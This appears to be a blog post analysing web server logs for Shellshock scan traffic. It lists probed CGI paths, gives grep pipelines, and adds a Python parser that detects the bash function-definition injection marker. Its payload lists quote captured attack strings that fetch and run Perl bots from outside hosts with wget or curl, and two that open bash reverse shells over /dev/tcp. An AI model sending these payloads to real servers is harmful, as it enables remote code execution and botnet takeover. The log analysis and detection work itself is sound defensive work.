ShellShock Scans (Update)
A little grep'ing through logs reveals the following scan patterns (entries highlighted in red in the original are from October):
Source IPs:
Page Requests:
GET /admin.cgi HTTP/1.1
GET //cgi-bin/bash HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/hello HTTP/1.1
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.1
GET /cgi-bin/php5? HTTP/1.1
GET /cgi-bin/php.fcgi HTTP/1.0
GET /cgi-bin/php? HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/test-cgi HTTP/1.1
GET /cgi-bin/test.cgi HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.1
GET / HTTP/1.0
GET / HTTP/1.1
GET /phppath/cgi_wrapper? HTTP/1.1
GET /phppath/php? HTTP/1.1
GET /tmUnblock.cgi HTTP/1.1
GET /cgi-bin/contact.cgi HTTP/1.1
GET /cgi-bin/defaultwebpage.cgi HTTP/1.1
GET /cgi-bin/env.cgi HTTP/1.1
GET /cgi-bin/forum.cgi HTTP/1.1
GET /cgi-bin/hello.cgi HTTP/1.1
GET /cgi-bin/index.cgi HTTP/1.1
GET /cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/main.cgi HTTP/1.1
GET /cgi-bin/meme.cgi HTTP/1.1
GET /cgi-bin/recent.cgi HTTP/1.1
GET /cgi-bin/sat-ir-web.pl HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/signon.cgi HTTP/1.1
GET /cgi-bin/test-cgi.pl HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.1
GET /cgi-bin/tools/tools.pl HTTP/1.1
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET / HTTP/1.1
GET /phppath/cgi_wrapper HTTP/1.1
GET /phppath/php HTTP/1.1
Payloads Referer:
() { :; }; /bin/ping -c 1 104.131.0.69
() { :; }; ping -c 11 209.126.230.74
() { :; }; ping -c 11 216.75.60.74
Payloads User Agent:
() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\""
() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z test.john-neil.com/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
() { :; }; /bin/ping -c 1 104.131.0.69"
() { :;}; /bin/ping -c 1 198.101.206.138"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
() { :;}; /bin/bash -c \"wget -O /var/tmp/muie.png actualproduce.com/js/nice.png;perl /var/tmp/muie.png\""
() { :;}; echo('VULNZZ');system('wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl');"
() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nVULNZZZ!\";system(\"wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
Commands used for grep'ing:
Source IPs:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d " " -f 1 | sort -u
Page Requests:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 2 | sort -u
Payloads Referer:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 4 | grep -v "^-$" | sort -u
Payloads User Agent:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 6- | grep -e "( *)" | sort -u
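The pipelines above split log lines on `"`, which goes wrong when a payload itself contains the escaped quotes `\"` that Apache writes into the log; that is why the User Agent command has to take field 6 onward and grep again, and why its output keeps the field's closing `"`. The parser below is an added example, not part of the original post: it steps over the `\"` escapes, keys on the tighter `() {` marker rather than any bare `()`, and produces the same four views from a few constructed log lines (documentation IPs and harmless payloads, not real traffic).

```python
import re

# Apache/nginx "combined" log line. Quoted fields may contain \" escapes, which
# a naive cut -d '"' splits at the wrong place; (?:[^"\\]|\\.)* steps over them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Shellshock marker: "()" then "{"; tighter than grep -e "( *)", which matches any bare "()".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    rec = m.groupdict()
    for key in ('request', 'referer', 'agent'):  # undo the server's \" and \\ escaping
        rec[key] = re.sub(r'\\(.)', r'\1', rec[key])
    return rec

def find_shellshock(lines):
    """Return the same four sorted views the page's grep pipelines produce."""
    hits = {'source_ips': set(), 'requests': set(),
            'referer_payloads': set(), 'agent_payloads': set()}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if not any(SHELLSHOCK_RE.search(rec[k]) for k in ('request', 'referer', 'agent')):
            continue
        hits['source_ips'].add(rec['ip'])
        hits['requests'].add(rec['request'])
        if SHELLSHOCK_RE.search(rec['referer']):
            hits['referer_payloads'].add(rec['referer'])
        if SHELLSHOCK_RE.search(rec['agent']):
            hits['agent_payloads'].add(rec['agent'])
    return {name: sorted(values) for name, values in hits.items()}

# Constructed sample log lines (documentation IPs, harmless payloads), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 208 '
    '"-" "() { :;}; /bin/bash -c \\"echo testing\\""',
    '198.51.100.7 - - [03/Oct/2014:11:30:00 +0000] "GET /cgi-bin/hello HTTP/1.1" 404 208 '
    '"() { :; }; /bin/ping -c 1 192.0.2.99" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Oct/2014:11:31:00 +0000] "GET /index.html HTTP/1.1" 200 1043 '
    '"-" "Mozilla/5.0 (X11) Gecko"',
]
```

Running `find_shellshock(SAMPLE_LOG)` on the constructed lines reports the two scanning IPs, their two requests, one Referer payload and one User Agent payload (with the escaped quotes unwrapped), and ignores the ordinary third line.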